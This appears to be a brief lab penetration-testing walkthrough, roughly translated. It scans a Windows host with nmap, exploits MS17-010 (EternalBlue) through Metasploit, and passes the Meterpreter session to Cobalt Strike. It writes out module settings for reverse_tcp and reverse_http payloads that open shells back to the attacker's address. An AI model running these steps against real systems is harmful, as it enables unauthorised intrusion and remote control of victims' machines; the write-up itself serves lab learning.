0x00 Environment Introduction
Attacker: 192.168.60.129 (kali)
Victim machine: 192.168.60.131
Tools: nmap, metaspolit, cobaltstrike
0x01 attack preparation
First deploy the victim host to modulate the network card to communicate with each other.
Next, deploy the web application service, which looks like a real application server.
0x02 pre-attack stage
Through the use of nmap information collection and discovery of open ports 445, 3389 and operating system version information.
nmap -A 192.168.60.131
Through information collection, it was discovered that the system opened port 445, and tools were used to detect whether there is a ms17_010 vulnerability, and it was found.
First open msf to exploit the vulnerability
1. Search and exploit modules
2. Exploitation of vulnerabilities
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set RHOST 192.168.60.131 set LHOST 192.168.60.129
Enter the meterpreter session.
Then use Cobaltstrike to play
If you think the functions are too few, you can also link with Cobaltstrike
Now get a MSF meterpreter type session, and the session id is 1.
Create a new monitor in Cobaltstrike and configure it as follows:
Set as follows in MSF:
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true set lhost 192.168.60.129 set lport 12388 set session 1
In this way, you can see that you have obtained the MSF bounced Meterpreter session in Cobaltstrike.
Finally, the penetration module integrated in Cobaltstrike can be used for further testing.
Note: Only the session of Meterpreter type can be derived from Cobaltstrike.
0x03 summary thinking
The collection of detailed information in the testing process means different penetration testing routes, and only the associated use and reuse of information can more effectively amplify the penetration results.